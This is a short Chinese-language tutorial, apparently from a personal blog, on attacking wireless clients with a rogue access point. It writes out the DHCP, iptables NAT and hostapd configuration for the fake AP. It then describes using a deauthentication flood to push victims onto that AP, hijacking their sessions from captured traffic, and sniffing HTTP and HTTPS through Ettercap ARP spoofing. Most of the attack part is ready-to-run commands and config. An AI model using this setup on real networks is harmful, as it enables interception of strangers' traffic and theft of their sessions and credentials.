攻击客户端

通过使用伪AP的方式来攻击客户端,监听数据、劫持会话、控制客户端

创建伪AP

  • 首先安装DHCP服务sudo apt-get install isc-dhcp-server -y
  • 修改/etc/dhcp/dhcpd.conf文件配置:
default-lease-time 600;
max-lease-time 7200;
ddns-update-style none;
authoritative;
subnet 192.168.2.0 netmask 255.255.255.0 {
        range 192.168.2.100 192.168.2.200;
        option subnet-mask 255.255.255.0;
        option routers 192.168.2.1;
        option broadcast-address 192.168.2.255;
        option domain-name-servers 192.168.2.1;
}
  • 修改/etc/default/isc-dhcp-server:
INTERFACESv4="wlan0"
  • 启动DHCP服务

    配置网络接口信息:ifconfig wlan0 192.168.2.1/24

    启动DHCP服务:sudo service isc-dhcp-server start

    查看DHCP服务状态:sudo service isc-dhcp-server status

  • 创建Iptables规则来启用包转发

    iptables --flush
    iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
    iptables --append FORWARD --in-interface wlan0 -j ACCEPT
    sysctl -w net.ipv4.ip_forward=1
  • 使用Hostapd创建伪AP

    编辑伪AP配置文件:/etc/hostapd/hostapd-wpa2.conf

    interface=wlan0
    ssid=WPA2
    channel=6
    beacon_int=100
    hw_mode=g
    wpa=2
    wpa_passphrase=12345678
    wpa_key_mgmt=WPA-PSK
    rsn_pairwise=CCMP

    启动:hostapd /etc/hostapd/hostapd-wpa2.conf

强制客户端连接到伪AP

通过取消认证洪水攻击来使用户断开与之前网络的连接,并连到我们设置的伪AP中去

劫持会话

用户连接到我们的网络中后,抓其流量包来劫持会话

监听数据

中间人攻击

Ettercap是一个基于ARP地址欺骗方式的网络嗅探工具,可以用来嗅探网络数据包

2023-02-27T16:44:04.png

2023-02-27T16:44:13.png

之后可以监听HTTP和HTTPS的数据